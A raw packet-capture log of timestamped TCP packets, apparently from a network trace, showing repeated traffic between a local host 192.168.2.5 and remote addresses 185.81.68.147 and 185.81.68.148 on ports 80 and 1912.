Dec 13, 2024 01:37:33.004508018 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.004540920 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.004555941 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.004575968 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.004580975 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.004616976 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.005548000 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.005582094 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.005594969 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.005616903 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.005624056 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.005656004 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.006692886 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.006727934 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.006741047 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.006768942 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.007383108 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.007419109 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.007430077 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.007458925 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.008851051 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.008884907 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.008903027 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.008919954 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.008927107 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.008954048 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.008963108 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.008996964 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.009924889 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.009958982 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.009982109 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.009993076 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.010994911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.011030912 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.011051893 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.011076927 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.011406898 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.011441946 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.011456013 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.011486053 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.012676001 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.012711048 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.012742996 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.012758017 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.013125896 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.013159037 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.013171911 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.013197899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.014205933 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.014239073 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.014249086 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.014280081 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.015013933 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.015048981 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.015058994 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.015088081 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.015906096 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.015940905 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.015954971 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.015980959 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.016391993 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.016434908 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.016875982 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.016933918 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.017533064 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.017568111 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.017590046 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.017606020 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.018116951 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.018168926 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.018170118 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.018218040 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.019042969 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.019093990 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.019109011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.019154072 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.020111084 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.020155907 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.020184040 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.020226955 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.020771027 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.020806074 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.020817041 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.020845890 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.021881104 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.021924019 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.021931887 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.021965027 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.022425890 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.022473097 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.022627115 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.022718906 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.023514032 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.023562908 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.023565054 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.023603916 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.024475098 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.024513006 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.024522066 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.024553061 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.030982971 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.031030893 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.031044960 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.031078100 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.031378984 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.031414032 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.031425953 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.031456947 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.031466961 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.032588005 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.032627106 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.032634020 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.032680035 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.033142090 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.033185959 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.036998987 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.037044048 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.038176060 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.038209915 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.038222075 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.038245916 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.038252115 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.038281918 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.038288116 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.038321018 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.039241076 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.039273977 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.039294958 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.039308071 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.039328098 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.039346933 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.040421009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.040457010 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.040465117 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.040498972 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.041074991 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.041110039 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.041120052 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.041151047 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.041923046 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.041968107 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.041982889 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.042025089 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.067557096 CET	49763	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.073493004 CET	80	49758	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.161554098 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.181041956 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.181078911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.181094885 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.181123018 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.182590008 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.182624102 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.182640076 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.182658911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.182679892 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.182694912 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.182697058 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.182729959 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.182739019 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.182770967 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.183154106 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.183190107 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.183269978 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.183969021 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.184020042 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.184225082 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.184268951 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.185050964 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.185085058 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.185094118 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.185132980 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.185966969 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.186001062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.186011076 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.186041117 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.187411070 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.187444925 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.187454939 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.187480927 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.187486887 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.187515020 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.187520027 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.187556028 CET	80	49763	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.187566042 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.187622070 CET	49763	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.187673092 CET	49763	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.188322067 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.188357115 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.188368082 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.188396931 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.189162970 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.189198017 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.189210892 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.189238071 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.190448046 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.190481901 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.190501928 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.190521955 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.190859079 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.190893888 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.190908909 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.190936089 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.192358017 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.192392111 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.192411900 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.192428112 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.192522049 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.192555904 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.192570925 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.192599058 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.193397045 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.193448067 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.193705082 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.193754911 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.194866896 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.194905043 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.194920063 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.194943905 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.195386887 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.195420027 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.195436954 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.195458889 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.197658062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.197690010 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.197707891 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.197724104 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.197731972 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.197757006 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.197762012 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.197793007 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.197805882 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.197829962 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.197839975 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.197876930 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.198671103 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.198704958 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.198721886 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.198749065 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.199393034 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.199425936 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.199441910 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.199470997 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.200201035 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.200236082 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.200249910 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.200280905 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.201312065 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.201344967 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.201360941 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.201390982 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.202091932 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.202126980 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.202158928 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.202171087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.203023911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.203058004 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.203078032 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.203099012 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.204082966 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.204117060 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.204132080 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.204160929 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.206185102 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.206218958 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.206335068 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.281672001 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.310084105 CET	80	49763	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.310187101 CET	49763	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.431303024 CET	80	49763	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.612313032 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.618848085 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.738528967 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.820683956 CET	80	49761	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:33.820736885 CET	49761	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:33.827222109 CET	80	49762	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.827272892 CET	49762	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.058012009 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:34.098504066 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.615421057 CET	49769	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.697628021 CET	49770	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.735093117 CET	80	49769	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:34.735166073 CET	49769	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.738554001 CET	49769	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.811338902 CET	80	49763	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:34.811388016 CET	80	49763	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:34.811444044 CET	49763	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.812864065 CET	49763	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.817415953 CET	80	49770	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:34.817522049 CET	49770	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.845196009 CET	49770	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.850542068 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.858181000 CET	80	49769	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:34.927110910 CET	49771	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:34.932724953 CET	80	49763	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:34.964848042 CET	80	49770	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:34.970212936 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.047164917 CET	80	49771	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.047255993 CET	49771	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.047310114 CET	49771	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.131268024 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.131330967 CET	49762	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.131719112 CET	49772	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.166982889 CET	80	49771	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.167045116 CET	49771	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.251389027 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.251465082 CET	80	49772	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.251517057 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.251564026 CET	49772	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.251890898 CET	80	49762	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.251979113 CET	49772	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.252022982 CET	49762	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.286349058 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.286959887 CET	80	49771	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.288592100 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.371633053 CET	80	49772	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.408241987 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.443936110 CET	49761	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:35.444436073 CET	49773	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:35.563843012 CET	80	49761	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:35.564084053 CET	80	49773	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:35.564201117 CET	49773	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:35.564254999 CET	49761	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:35.588182926 CET	49773	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:35.644678116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.707802057 CET	80	49773	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:35.729777098 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.764358997 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.764455080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.765758038 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.781919003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.781959057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782016993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782016993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782051086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782084942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782085896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782123089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782123089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782157898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.782191038 CET	49775	80	192.168.2.5	185.81.68.147
